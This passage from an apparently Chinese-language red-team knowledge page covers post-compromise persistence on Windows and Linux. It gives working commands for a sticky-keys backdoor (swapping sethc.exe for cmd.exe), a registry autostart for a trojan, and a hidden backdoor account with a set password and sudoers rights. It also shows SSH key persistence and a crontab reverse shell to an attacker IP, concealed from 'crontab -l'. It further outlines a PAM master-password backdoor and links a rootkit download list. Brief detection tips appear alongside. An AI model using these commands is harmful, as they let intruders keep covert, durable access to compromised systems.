ren sethc.exe cmd.exeren aaa.exe sethc.exe
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>连按5下Shift弹出cmd窗口</p> <blockquote><p><strong>检查后门</strong>：连续按5下弹出cmd窗口（当然还有其它放大镜讲述人等）</p></blockquote> <p>木马加入开机启动项</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>reg <span class="token function">add</span> HKEY_CURRENT_USER<span class="token punctuation">\</span>SOFTWARE<span class="token punctuation">\</span>Microsoft<span class="token punctuation">\</span>Windows<span class="token punctuation">\</span>CurrentVersion<span class="token punctuation">\</span>Run /v SunRAC /t reg_sz /d <span class="token string">&quot;C:\Users\Public\Downloads\msservice.exe&quot;</span> 
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h3 id="linux">Linux <a href="#linux" class="header-anchor">#</a></h3> <p><strong>增加超级用户账号</strong></p> <blockquote><p><strong>如果系统不允许<code>uid=0</code>的用户（<code>root</code>）远程登录，可以添加一个普通用户，并将其加入sudoers</strong></p></blockquote> <p><strong>增加用户</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">useradd</span> phP		
<span class="token builtin class-name">echo</span> @admin.886<span class="token operator">|</span><span class="token function">passwd</span> --stdin phP

<span class="token comment">#添加账户</span>
<span class="token comment">#设置密码(密码符合要密码强度策略)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>修改sudoers赋予sudo权限</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">chmod</span> +w /etc/sudoers    
<span class="token builtin class-name">echo</span> <span class="token string">&quot;phP ALL=(ALL) ALL&quot;</span> <span class="token operator">&gt;&gt;</span> /etc/sudoers	
<span class="token function">chmod</span> -w /etc/sudoers

<span class="token comment">#赋予写入权限</span>
<span class="token comment">#添加sudo用户</span>
<span class="token comment">#撤销写入权限</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>或者还可以修改/etc/passwd文件，把用户uid改为0。</p> <p><strong>SSH公钥无密码登录</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>ssh-keygen -t rsa    <span class="token comment">#本机生成rsa公钥</span>

<span class="token comment">#把id_rsa.pub写入服务端的authorized_keys中</span>
<span class="token function">chmod</span> <span class="token number">600</span> ~/.ssh/authorized_keys
<span class="token function">chmod</span> <span class="token number">700</span> ~/.ssh
<span class="token builtin class-name">echo</span> <span class="token string">&quot;id_rsa.pub的内容&quot;</span> <span class="token operator">&gt;</span> ~/.ssh/authorized_keys

<span class="token comment">#没有这个文件的话，就自己创建一个</span>
<span class="token builtin class-name">cd</span> ~/
<span class="token function">mkdir</span> .ssh
<span class="token builtin class-name">cd</span> .ssh
<span class="token function">touch</span> authorized_keys
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br></div></div><p><strong>Crontab定时反弹shell</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token punctuation">(</span>crontab -l<span class="token punctuation">;</span><span class="token builtin class-name">printf</span> <span class="token string">&quot;*/1 * * * * exec 9&lt;&gt; /dev/tcp/攻击者IP/8888;exec 0&lt;&amp;9;exec 1&gt;&amp;9 2&gt;&amp;1;/bin/bash --noprofile -i;<span class="token entity" title="\r">\r</span>no crontab for <span class="token variable"><span class="token variable">`</span><span class="token function">whoami</span><span class="token variable">`</span></span>%100c<span class="token entity" title="\n">\n</span>&quot;</span><span class="token punctuation">)</span><span class="token operator">|</span><span class="token function">crontab</span> -

<span class="token comment">#每分钟执行一次，并且crontab -l看不出来</span>
<span class="token comment">#这种要用crontab -e 进去查看并编辑才能看到</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><strong>PAM后门</strong></p> <blockquote><p>**PAM （Pluggable Authentication Modules ）**是由Sun提出的一种认证机制。</p> <p>它通过提供一些动态链接库和一套统一的API，将系统提供的服务和该服务的认证方式分开</p> <p>使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式，而无需更改服务程序</p> <p>同时也便于向系统中添加新的认证手段</p></blockquote> <p><strong>步骤：</strong></p> <p>1、获取目标系统所使用的PAM版本，下载对应版本的pam版本</p> <p>2、解压缩，修改pam_unix_auth.c文件，添加万能密码</p> <p>3、编译安装PAM</p> <p>4、编译完后的文件在：modules/pam_unix/.libs/pam_unix.so，复制到/lib64/security中进行替换</p> <p>​		即可使用万能密码登陆，并将用户名密码记录到文件中</p> <p><strong>排查PAM后门技巧：</strong></p> <p>1、通过Strace跟踪ssh</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">ps</span> axu <span class="token operator">|</span> <span class="token function">grep</span> sshd
<span class="token function">strace</span> -o aa -ff -p PID
<span class="token function">grep</span> <span class="token function">open</span> aa* <span class="token operator">|</span> <span class="token function">grep</span> -v -e No -e null -e denied<span class="token operator">|</span> <span class="token function">grep</span> WR
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>2、检查pam_unix.so的修改时间</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">stat</span> /lib/security/pam_unix.so      <span class="token comment">#32位</span>
<span class="token function">stat</span> /lib64/security/pam_unix.so    <span class="token comment">#64位</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>Rootkit工具包</strong></p> <blockquote><p>rootkit是一种特殊的恶意软件。三要素是：<strong>隐藏、操纵、收集数据</strong>。</p> <p>功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息</p> <p>多见的rootkit一般都是木马、后门和其它恶意程序结合使用</p> <p><strong>Rootkit通过加载特殊的驱动，修改系统内核，进而达到隐藏信息的目的</strong></p> <p>Rootkit是攻击者用来隐藏自己的踪迹和保留root访问权限的工具</p></blockquote> <p><strong>Rootkit类型</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>固件Rootkit
虚拟化Rootkit
内核级Rootkit
库级Rootkit
应用级Rootkit
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>Rootkit工具包列表</strong>：https://github.com/d30sa1/RootKits-List-Download  （注意与<code>Centos</code>版本适配）</p> <p><strong>检测与防护：</strong></p> <p>rkhunter：http://rkhunter.sourceforge.net/</p> <p>chkrootkit：http://www.chkrootkit.org/download/</p> <p>定期检查md5，对于找出的 Rootkit，最好的应对方法是擦除并重新安装系统</p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/hw/to-root.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        权限提升
      </a></span> <span class="next"><a href="/knowledge/hw/transverse.html">
        内网横向移动技巧
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/54.d132c2f8.js" defer></script>
  </body>
</html>